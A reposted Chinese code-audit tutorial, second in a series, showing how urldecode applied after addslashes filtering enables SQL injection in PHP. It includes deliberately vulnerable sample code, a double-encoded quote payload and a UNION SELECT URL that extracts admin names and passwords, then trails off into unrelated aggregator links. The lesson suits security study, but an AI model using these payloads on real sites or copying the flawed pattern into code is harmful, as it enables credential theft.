代码审计的艺术系列—第二篇
来源:互联网 发布:1688一键传淘宝教程 编辑:程序博客网 时间:2024/06/07 03:21
0x01 前言
现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等传递的参数通常使用addslashes()函数进行转义,并引入一个类似common.php的文件进行处理addslashes()函数对接收的参数进行过滤,尤其是单引号。处理代码如下:
if (!empty($_GET)){$_GET = addslashes_deep($_GET);}if (!empty($_POST)){$_POST = addslashes_deep($_POST);}if (!empty($_COOKIE)){$_COOKIE = addslashes_deep($_COOKIE);}...function addslashes_deep($value){ if (empty($value)) { return $value; } else {if (!get_magic_quotes_gpc()){$value=is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);}else{$value=is_array($value) ? array_map('addslashes_deep', $value) : mystrip_tags($value);}return $value; }}addslashes_deep函数会判断GPC是否开启,如果没有开启就会对GET、POST和COOKIE传递的参数进行转义。然而仅仅使用这种方式会存在很多绕过的情况。接下来两篇会介绍这种防护下的存在被绕过的一些场景和案例~,这里有几篇确定好。
0x02 准备
知识储备:php基础、MySql入门
工具:notepad++
服务器环境:wamp
测试代码和sql:微信回复『代码2』 需要更新。
0x03 全局防护Bypass上篇的脑图
0x04 编码解码函数导致的Bypass一些编码解码的函数像urldecode、base64decode的使用会导致绕过addslashes函数的全局防护,以urldecode函数为例,缺陷代码如下:
<?phprequire_once('common.php');$conn = mysql_connect('localhost', 'root', 'braid') or die('bad!');mysql_query("SET NAMES binary'");mysql_select_db('test', $conn) OR emMsg("数据库连接失败");//这里使用了urldecode进行解码$id = isset($_GET['id']) ? urldecode($_GET['id']) : 1;//这里的sql语句有单引号保护,即特殊字符像单引号就会通过addslashes的处理$sql = "SELECT * FROM news WHERE id='{$id}'";$result = mysql_query($sql, $conn) or die(mysql_error()); ?>浏览器输入”http://localhost/sqltest/urldecode.php?id=1'",发现输出了一条新闻的标题和内容如下图:
说明单引号经过了addslashes函数的转义,我们查下sql查询的日志,确实是对单引号进行转义处理了:
SELECT * FROM news WHERE id='1\''输入”http://localhost/sqltest/urldecode.php?id=1%2527",发现如下图的报错:
这种报错在安全测试人员眼里就是注入的标志。进一步观察数据库,发现除了news表外还有个admin表,我们可以构造获取管理员账户密码的语句”http://localhost/sqltest/urldecode.php?id=1%2527 union select 1,2,concat(name,0x23,pass) from admin%23”
对应执行的sql语句:
SELECT SQL_CALC_FOUND_ROWS * FROM news WHERE id = '-1' union select 1 , 2, concat( name, 0x23, pass ) from admin
原创文章,转载请注明: 转载自安兔|anntoo.com 互联网安全新媒体平台
本文链接地址: 代码审计的艺术系列—第二篇
- 代码审计的艺术系列—第二篇
- 代码审计的艺术系列—第三篇
- 代码审计的艺术系列—第四篇
- 代码审计的艺术系列—第五篇
- 代码审计的艺术系列—第六篇
- 代码审计的艺术系列—第七篇
- 代码审计的艺术系列—第八篇
- 代码审计的艺术系列—第九篇
- 代码审计的艺术系列—第一篇
- 代码审计的思路
- 编写易读代码的艺术——第二章 把精确包含到名字里
- 三个白帽挑战赛第二期的writeup(详细记录一系列的坑) [代码审计]
- php代码审计相关的
- 一步步破解app协议第二步(审计代码)
- 代码审计
- 写代码的艺术
- 修改代码的艺术
- 代码优化的艺术
- UVALive 7261 A - Xiongnu's Land
- 按钮简单选择器
- 如何让div中的文字居中
- java --内存溢出的问题
- apache 问题 You don't have permission to access /test.php on this server 解决方法
- 代码审计的艺术系列—第二篇
- 对linux下mv、chmod命令基本功能的实现
- POJ 2653 Pick-up sticks [线段相交]【计算几何】
- Java的基础知识1
- 第一次的给codeforce
- android一个LinearLayout中具有几个控件,想要使那几个控件在LinearLayout被点击时,有颜色变化
- Android通过请求网络数据实现ListView,ListView的优化、图片的缓存、子控件的点击事件。
- httpd: Could not reliably determine the server's fully qualified domain name
- 跑马灯的实现
